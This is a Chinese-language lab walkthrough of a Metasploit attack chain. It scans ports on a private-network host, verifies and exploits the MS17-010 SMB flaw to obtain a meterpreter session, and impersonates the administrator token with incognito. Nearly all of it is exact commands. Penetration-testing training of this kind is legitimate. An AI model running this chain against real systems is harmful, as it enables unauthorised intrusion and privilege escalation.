通过Metasploit扫描目标端口、识别目标smb服务、验证smb服务是否漏洞、攻击smb漏洞服务获得会话,窃取会话token
介绍
msf有三种使用模式,分别是控制台、GUI图形化、web界面,常用的就是控制台。msf攻击一般来说都是先扫描(auxiliary)–攻击(exploits)–模块(payload)–后渗透(post)
msf扫描
查找msf端口扫描模块:search portscan
使用tcp扫描端口,命令:use auxiliary/scanner/portscan/tcp或者use 5
Options查看需要设置的选项
设置需要扫描的目标、线程以及端口
命令:set rhosts 192.168.128.137
Set treads 20
端口根据需要进行设置
根据扫描结果,发现目标主机开启了smb服务
对目标主机验证smb服务是否存在漏洞
命令:search auxiliary/scanner/smb/smb_ms17_010
利用模块进行验证,设置相关参数
Set rhost 192.168.128.137
Run
通过验证,发现主机极有可能存在smb服务漏洞
利用smb漏洞攻击目标主机
查找攻击模块
Search ms17_010
利用模块
对相关参数进行设置
Set rhost 192.168.128.137
Run
成功获得meterpreter会话
窃取token会话
查看当前会话权限
命令:getuid 目的是查看当前权限
使用令牌窃取工具
命令:use incognito
List_tokens -u 目的是查看存在的令牌
切换管理员令牌:impersonate_token ‘WIN-J1BPIGJK08N\administrator’
Token窃取成功